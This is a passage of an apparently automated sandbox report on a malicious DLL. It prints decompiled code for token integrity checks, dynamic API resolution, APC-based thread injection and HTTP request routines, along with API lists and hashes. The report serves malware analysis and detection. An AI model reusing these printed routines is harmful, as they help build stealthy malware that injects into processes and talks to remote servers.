								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E010C17AB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                    0x010c13dc
                    0x010c13e3
                    0x010c13ea
                    0x010c13fe
                    0x010c1409
                    0x010c1421
                    0x010c142e
                    0x010c1431
                    0x010c1436
                    0x010c1441
                    0x010c1445
                    0x010c1454
                    0x010c1458
                    0x010c1474
                    0x010c1474
                    0x010c1478
                    0x010c1478
                    0x010c147d
                    0x010c1481
                    0x010c1487
                    0x010c1488
                    0x010c148f
                    0x010c1495

                    APIs
                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 010C1401
                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 010C1421
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 010C1431
                    • CloseHandle.KERNEL32(00000000), ref: 010C1481
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 010C1454
                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 010C145C
                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 010C146C
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                    • String ID:
                    • API String ID: 1295030180-0
                    • Opcode ID: 3d173533255689fe1f26809580d8a882255de89ee8cf943275cd91bcbb46097e
                    • Instruction ID: 46beb270370c388837b048ffedc51121b0b725fc126c2b1ea5b2b717b8153a02
                    • Opcode Fuzzy Hash: 3d173533255689fe1f26809580d8a882255de89ee8cf943275cd91bcbb46097e
                    • Instruction Fuzzy Hash: 21215C7590021DFFEB109FA4DC44EEEBBB9EB44704F1040A9F690A3291D7764A40EF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C18BA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 64%
                    			E010C18BA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x10ca320; // 0x26dd5a8
				_t1 = _t9 + 0x10cb62c; // 0x253d7325
				_t36 = 0;
				_t28 = E010C61A7(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t40 = E010C63FD(_v8 +  *_t39(_a4) + 1);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E010C7885(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E010C17AB(_t40);
						_t42 = E010C6863(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E010C17AB(_t36);
							_t36 = _t42;
						}
						_t43 = E010C5ACD(_t36, _t33);
						if(_t43 != 0) {
							E010C17AB(_t36);
							_t36 = _t43;
						}
					}
					E010C17AB(_t28);
				}
				return _t36;
			}
















                    0x010c18ba
                    0x010c18bd
                    0x010c18be
                    0x010c18c5
                    0x010c18cc
                    0x010c18d3
                    0x010c18d7
                    0x010c18de
                    0x010c18e5
                    0x010c18ea
                    0x010c18fc
                    0x010c1900
                    0x010c1904
                    0x010c190a
                    0x010c190f
                    0x010c1919
                    0x010c191f
                    0x010c1921
                    0x010c1938
                    0x010c193c
                    0x010c193f
                    0x010c1944
                    0x010c1944
                    0x010c194d
                    0x010c1951
                    0x010c1954
                    0x010c1959
                    0x010c1959
                    0x010c1951
                    0x010c195c
                    0x010c1961
                    0x010c1967

                    APIs
                      • Part of subcall function 010C61A7: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,010C18D3,253D7325,00000000,7691C740,?,?,010C6ABB,?,037A95B0), ref: 010C620E
                      • Part of subcall function 010C61A7: sprintf.NTDLL ref: 010C622F
                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,010C6ABB,?,037A95B0), ref: 010C18E5
                    • lstrlen.KERNEL32(?,?,?,010C6ABB,?,037A95B0), ref: 010C18ED
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • strcpy.NTDLL ref: 010C1904
                    • lstrcat.KERNEL32(00000000,?), ref: 010C190F
                      • Part of subcall function 010C7885: lstrlen.KERNEL32(?,?,?,00000000,?,010C191E,00000000,?,?,?,010C6ABB,?,037A95B0), ref: 010C7896
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,010C6ABB,?,037A95B0), ref: 010C192C
                      • Part of subcall function 010C6863: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,010C1938,00000000,?,?,010C6ABB,?,037A95B0), ref: 010C686D
                      • Part of subcall function 010C6863: _snprintf.NTDLL ref: 010C68CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                    • String ID: =
                    • API String ID: 2864389247-1428090586
                    • Opcode ID: 284d03586e2122723c9de2005c03dc44ff9b9715b559f43144628c7e490e03ad
                    • Instruction ID: 29cdd1e1c2f185ba3c8df29e178c34e4345e59c759e439d93efbf90e310f3ffb
                    • Opcode Fuzzy Hash: 284d03586e2122723c9de2005c03dc44ff9b9715b559f43144628c7e490e03ad
                    • Instruction Fuzzy Hash: BF11CA77901126AB4722ABB98C84CEF36BD9E95E54309015DF680E7201DE79CD029FA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C1E51 Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 398 10c1e51-10c1e9d SysAllocString 399 10c1fc1-10c1fc4 398->399 400 10c1ea3-10c1ecf 398->400 401 10c1fcf-10c1fd2 399->401 402 10c1fc6-10c1fc9 SafeArrayDestroy 399->402 406 10c1fbe 400->406 407 10c1ed5-10c1ee1 call 10c56cf 400->407 404 10c1fdd-10c1fe4 401->404 405 10c1fd4-10c1fd7 SysFreeString 401->405 402->401 405->404 406->399 407->406 410 10c1ee7-10c1ef7 407->410 410->406 412 10c1efd-10c1f23 IUnknown_QueryInterface_Proxy 410->412 412->406 414 10c1f29-10c1f3d 412->414 416 10c1f3f-10c1f42 414->416 417 10c1f7b-10c1f7e 414->417 416->417 420 10c1f44-10c1f5b StrStrIW 416->420 418 10c1fb5-10c1fba 417->418 419 10c1f80-10c1f85 417->419 418->406 419->418 421 10c1f87-10c1f92 call 10c57a8 419->421 422 10c1f5d-10c1f66 call 10c3d67 420->422 423 10c1f72-10c1f75 SysFreeString 420->423 426 10c1f97-10c1f9b 421->426 422->423 429 10c1f68-10c1f70 call 10c56cf 422->429 423->417 426->418 428 10c1f9d-10c1fa2 426->428 430 10c1fa4-10c1fae 428->430 431 10c1fb0 428->431 429->423 430->418 431->418
                    APIs
                    • SysAllocString.OLEAUT32(?), ref: 010C1E92
                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 010C1F14
                    • StrStrIW.SHLWAPI(?,006E0069), ref: 010C1F53
                    • SysFreeString.OLEAUT32(?), ref: 010C1F75
                      • Part of subcall function 010C3D67: SysAllocString.OLEAUT32(010C9290), ref: 010C3DB7
                    • SafeArrayDestroy.OLEAUT32(?), ref: 010C1FC9
                    • SysFreeString.OLEAUT32(?), ref: 010C1FD7
                      • Part of subcall function 010C56CF: Sleep.KERNEL32(000001F4), ref: 010C5717
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                    • String ID:
                    • API String ID: 2118684380-0
                    • Opcode ID: 216b162d34521a8a58224a83c5311affaf4b8fe715cc846e816775fc27985bcd
                    • Instruction ID: 1ee6c9fd2e5bc0320f211d017a413ab5648ddf8740bb069d2a2fa51287a0ea12
                    • Opcode Fuzzy Hash: 216b162d34521a8a58224a83c5311affaf4b8fe715cc846e816775fc27985bcd
                    • Instruction Fuzzy Hash: CA511E3690020AEFDB11DFA8C8848DEB7B6FF88740B148968F695DB215D735AD46CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 100013D3 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E100013D3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E100011B5(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x100041d0 + 0x10005014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x100041d0 + 0x10005151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E1000164B(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x100041d0 + 0x10005161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x100041d0 + 0x10005174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x100041d0 + 0x10005189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x100041d0 + 0x1000519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E10001F61(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                    0x100013e1
                    0x100013e5
                    0x100014a6
                    0x100013eb
                    0x10001403
                    0x10001412
                    0x10001419
                    0x1000141d
                    0x10001420
                    0x1000149e
                    0x1000149f
                    0x10001422
                    0x1000142f
                    0x10001433
                    0x10001436
                    0x00000000
                    0x10001438
                    0x10001445
                    0x10001449
                    0x1000144c
                    0x00000000
                    0x1000144e
                    0x1000145b
                    0x1000145f
                    0x10001462
                    0x00000000
                    0x10001464
                    0x10001471
                    0x10001475
                    0x10001478
                    0x00000000
                    0x1000147a
                    0x10001480
                    0x10001486
                    0x1000148b
                    0x10001492
                    0x10001495
                    0x00000000
                    0x10001497
                    0x1000149a
                    0x1000149a
                    0x10001495
                    0x10001478
                    0x10001462
                    0x1000144c
                    0x10001436
                    0x10001420
                    0x100014b4

                    APIs
                      • Part of subcall function 100011B5: HeapAlloc.KERNEL32(00000000,?,1000109E,00000030,74E063F0,00000000), ref: 100011C1
                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001206,?,?,?,?,?,00000002,?,?), ref: 100013F7
                    • GetProcAddress.KERNEL32(00000000,?), ref: 10001419
                    • GetProcAddress.KERNEL32(00000000,?), ref: 1000142F
                    • GetProcAddress.KERNEL32(00000000,?), ref: 10001445
                    • GetProcAddress.KERNEL32(00000000,?), ref: 1000145B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 10001471
                      • Part of subcall function 10001F61: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 10001FBE
                      • Part of subcall function 10001F61: memset.NTDLL ref: 10001FE0
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                    • String ID:
                    • API String ID: 1632424568-0
                    • Opcode ID: f54d37019bd0a3907d6a4d2a0eee03f8a27b9bfcd0a2685390fea836632d30ff
                    • Instruction ID: a280ba596086205d6612a48facacf8e39ed2ae595c2d3fb1e7d1c55ba2bff53d
                    • Opcode Fuzzy Hash: f54d37019bd0a3907d6a4d2a0eee03f8a27b9bfcd0a2685390fea836632d30ff
                    • Instruction Fuzzy Hash: 70212CB1A0031AAFE750DF69CC80EEB77ECEB483C4B024565E905D7229EB31E9058B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001CF3 Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000418c;
						if( *0x1000418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004198;
								if( *0x10004198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000418c);
						}
						HeapDestroy( *0x10004190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x10004190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x100041b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E1000193D(E100014B7, E10001300(_a12, 1, 0x10004198, _t41));
							 *0x1000418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                    0x10001cf6
                    0x10001d02
                    0x10001d04
                    0x10001d07
                    0x10001d7d
                    0x10001d83
                    0x10001d85
                    0x10001d87
                    0x10001d8d
                    0x10001d8f
                    0x10001d94
                    0x10001d97
                    0x10001da2
                    0x10001da4
                    0x00000000
                    0x00000000
                    0x10001da6
                    0x10001da9
                    0x10001dab
                    0x00000000
                    0x00000000
                    0x00000000
                    0x10001dab
                    0x10001db3
                    0x10001db3
                    0x10001dbf
                    0x10001dbf
                    0x10001d09
                    0x10001d0a
                    0x10001d2a
                    0x10001d30
                    0x10001d32
                    0x10001d37
                    0x10001d73
                    0x10001d73
                    0x10001d39
                    0x10001d41
                    0x10001d48
                    0x10001d52
                    0x10001d5e
                    0x10001d65
                    0x10001d6a
                    0x10001d6f
                    0x00000000
                    0x10001d6f
                    0x10001d6a
                    0x10001d37
                    0x10001d0a
                    0x10001dcc

                    APIs
                    • InterlockedIncrement.KERNEL32(10004188), ref: 10001D15
                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001D2A
                      • Part of subcall function 1000193D: CreateThread.KERNEL32 ref: 10001954
                      • Part of subcall function 1000193D: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001969
                      • Part of subcall function 1000193D: GetLastError.KERNEL32(00000000), ref: 10001974
                      • Part of subcall function 1000193D: TerminateThread.KERNEL32(00000000,00000000), ref: 1000197E
                      • Part of subcall function 1000193D: CloseHandle.KERNEL32(00000000), ref: 10001985
                      • Part of subcall function 1000193D: SetLastError.KERNEL32(00000000), ref: 1000198E
                    • InterlockedDecrement.KERNEL32(10004188), ref: 10001D7D
                    • SleepEx.KERNEL32(00000064,00000001), ref: 10001D97
                    • CloseHandle.KERNEL32 ref: 10001DB3
                    • HeapDestroy.KERNEL32 ref: 10001DBF
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                    • String ID:
                    • API String ID: 2110400756-0
                    • Opcode ID: 13dfcc9937a48d62d294691890955a981852baba5314c62008552e9375a091a5
                    • Instruction ID: 6261312e1bd365bc3db350999f739fc83ac6b46b61c7f1ad2c4c54cd954a449e
                    • Opcode Fuzzy Hash: 13dfcc9937a48d62d294691890955a981852baba5314c62008552e9375a091a5
                    • Instruction Fuzzy Hash: 9121CDB1601212ABF701DFA9DCD8ACA7BECFB552E1712842AF505D316CEB309D40CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C43D8 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C43D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E010C395B(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E010C7A34(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                    0x010c43d8
                    0x010c43e5
                    0x010c43e7
                    0x010c444a
                    0x00000000
                    0x010c444a
                    0x010c43ff
                    0x010c4406
                    0x010c4412
                    0x010c4417
                    0x010c442d
                    0x010c443d
                    0x00000000
                    0x010c442f
                    0x010c442f
                    0x010c4436
                    0x010c4443
                    0x010c4443
                    0x010c4443
                    0x010c4436
                    0x010c442d
                    0x010c4448
                    0x00000000
                    0x00000000
                    0x010c444e

                    APIs
                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,010C1AE3,?,?,00000000,00000000), ref: 010C4412
                    • ResetEvent.KERNEL32(?), ref: 010C4417
                    • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 010C4424
                    • GetLastError.KERNEL32 ref: 010C442F
                    • GetLastError.KERNEL32(?,?,00000102,010C1AE3,?,?,00000000,00000000), ref: 010C444A
                      • Part of subcall function 010C395B: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,010C43F7,?,?,?,?,00000102,010C1AE3,?,?,00000000), ref: 010C3967
                      • Part of subcall function 010C395B: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,010C43F7,?,?,?,?,00000102,010C1AE3,?), ref: 010C39C5
                      • Part of subcall function 010C395B: lstrcpy.KERNEL32(00000000,00000000), ref: 010C39D5
                    • SetEvent.KERNEL32(?), ref: 010C443D
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                    • String ID:
                    • API String ID: 3739416942-0
                    • Opcode ID: 9d624b078a56f6dea8588ae26de582068ef879959fa9c46daf2eeaec852565a2
                    • Instruction ID: f95c1384fe8824cf8b0f9942abe5154837bd2f7ff2e1c1f2fe360022495bae55
                    • Opcode Fuzzy Hash: 9d624b078a56f6dea8588ae26de582068ef879959fa9c46daf2eeaec852565a2
                    • Instruction Fuzzy Hash: 9F014F31104201AEEB716F65DC44B5FBAE9FF84B24F304669F9D1D20E0DB21D4149E11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1000193D Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E1000193D(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x100041cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                    0x10001954
                    0x1000195a
                    0x1000195e
                    0x10001969
                    0x10001971
                    0x1000197a
                    0x1000197e
                    0x10001985
                    0x1000198c
                    0x1000198e
                    0x10001994
                    0x10001971
                    0x10001998

                    APIs
                    • CreateThread.KERNEL32 ref: 10001954
                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001969
                    • GetLastError.KERNEL32(00000000), ref: 10001974
                    • TerminateThread.KERNEL32(00000000,00000000), ref: 1000197E
                    • CloseHandle.KERNEL32(00000000), ref: 10001985
                    • SetLastError.KERNEL32(00000000), ref: 1000198E
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                    • String ID:
                    • API String ID: 3832013932-0
                    • Opcode ID: 838479c296ba5b9e5e505516a417fd66a98e78a8f80a51d9605afcd81546753f
                    • Instruction ID: 21a3d0af9bea0887cf82ba0fb9141141845726cbf6105ad59c24e03e3f2a7651
                    • Opcode Fuzzy Hash: 838479c296ba5b9e5e505516a417fd66a98e78a8f80a51d9605afcd81546753f
                    • Instruction Fuzzy Hash: 3BF08C72606631BBF3135BA08CACF9BBFACFB097C1F01C504F60991068D72188008BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C3A12 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 65%
                    			E010C3A12(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				void* _t26;
				intOrPtr _t30;
				intOrPtr _t37;
				void* _t38;
				intOrPtr* _t43;
				void* _t44;
				void* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t51;

				_t48 = __edx;
				_t44 = __ecx;
				_t43 = _a16;
				_t49 = __eax;
				_t22 =  *0x10ca320; // 0x26dd5a8
				_t2 = _t22 + 0x10cb682; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
				_t51 =  *0x10ca3e0; // 0x37a9b60
				_push(0x800);
				_push(0);
				_push( *0x10ca2d8);
				if( *0x10ca2ec >= 5) {
					_t26 = RtlAllocateHeap(); // executed
					if(_t26 == 0) {
						L6:
						_a4 = 8;
						L7:
						if(_a4 != 0) {
							L10:
							 *0x10ca2ec =  *0x10ca2ec + 1;
							L11:
							return _a4;
						}
						_t52 = _a16;
						 *_t49 = _a16;
						_t50 = _v8;
						 *_t43 = E010C52A9(_t52, _t50); // executed
						_t30 = E010C4DC8(_t50, _t52); // executed
						if(_t30 != 0) {
							 *_a8 = _t50;
							 *_a12 = _t30;
							if( *0x10ca2ec < 5) {
								 *0x10ca2ec =  *0x10ca2ec & 0x00000000;
							}
							goto L11;
						}
						_a4 = 0xbf;
						E010C5F6A();
						RtlFreeHeap( *0x10ca2d8, 0, _t50); // executed
						goto L10;
					}
					_t37 = E010C68EB(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
					L5:
					_a4 = _t37;
					goto L7;
				}
				_t38 = RtlAllocateHeap(); // executed
				if(_t38 == 0) {
					goto L6;
				}
				_t37 = E010C2FC4(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38); // executed
				goto L5;
			}

















                    0x010c3a12
                    0x010c3a12
                    0x010c3a19
                    0x010c3a20
                    0x010c3a24
                    0x010c3a29
                    0x010c3a34
                    0x010c3a3a
                    0x010c3a4a
                    0x010c3a4f
                    0x010c3a51
                    0x010c3a57
                    0x010c3a7b
                    0x010c3a83
                    0x010c3aa0
                    0x010c3aa0
                    0x010c3aa7
                    0x010c3aab
                    0x010c3ae5
                    0x010c3ae5
                    0x010c3aeb
                    0x010c3af2
                    0x010c3af2
                    0x010c3aad
                    0x010c3ab0
                    0x010c3ab2
                    0x010c3abf
                    0x010c3ac1
                    0x010c3ac8
                    0x010c3aff
                    0x010c3b04
                    0x010c3b06
                    0x010c3b08
                    0x010c3b08
                    0x00000000
                    0x010c3b06
                    0x010c3aca
                    0x010c3ad1
                    0x010c3adf
                    0x00000000
                    0x010c3adf
                    0x010c3a96
                    0x010c3a9b
                    0x010c3a9b
                    0x00000000
                    0x010c3a9b
                    0x010c3a59
                    0x010c3a61
                    0x00000000
                    0x00000000
                    0x010c3a74
                    0x00000000

                    APIs
                    • wsprintfA.USER32 ref: 010C3A34
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010C3A59
                      • Part of subcall function 010C2FC4: GetTickCount.KERNEL32 ref: 010C2FD8
                      • Part of subcall function 010C2FC4: wsprintfA.USER32 ref: 010C3028
                      • Part of subcall function 010C2FC4: wsprintfA.USER32 ref: 010C3045
                      • Part of subcall function 010C2FC4: wsprintfA.USER32 ref: 010C3065
                      • Part of subcall function 010C2FC4: wsprintfA.USER32 ref: 010C3091
                      • Part of subcall function 010C2FC4: HeapFree.KERNEL32(00000000,00000000), ref: 010C30A3
                      • Part of subcall function 010C2FC4: wsprintfA.USER32 ref: 010C30C4
                      • Part of subcall function 010C2FC4: HeapFree.KERNEL32(00000000,00000000), ref: 010C30D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010C3A7B
                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 010C3ADF
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
